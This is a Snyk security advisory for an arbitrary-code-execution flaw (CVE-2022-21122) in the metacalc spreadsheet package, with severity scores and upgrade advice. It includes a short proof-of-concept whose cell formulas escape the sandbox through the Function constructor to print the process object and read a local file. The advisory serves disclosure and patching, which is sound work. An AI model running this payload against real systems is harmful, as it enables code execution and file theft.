Arbitrary Code Execution Affecting metacalc package, versions <0.0.2
Snyk CVSS
Attack Complexity
High
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.8% (82nd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-METACALC-2826197
- published 30 May 2022
- disclosed 17 May 2022
- credit Vladyslav Dukhin
Introduced: 17 May 2022
CVE-2022-21122 Open this link in a new tabHow to fix?
Upgrade metacalc
to version 0.0.2 or higher.
Overview
metacalc is a Spreadsheet calculations for Metarhia
Affected versions of this package are vulnerable to Arbitrary Code Execution when it exposes JavaScript's Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript's Function constructor.
PoC
const { Sheet } = require('metacalc');
const sheet = new Sheet();
sheet.cells['A1'] = '=Math.ceil.constructor("console.log(process)")()';
console.log(sheet.values['A1']);
sheet.cells['A3'] = '=Math.ceil.constructor("console.log(process.mainModule.require(\'fs\').readFileSync(\'./poc.js\', \'utf-8\'))")()';
console.log(sheet.values['A3']);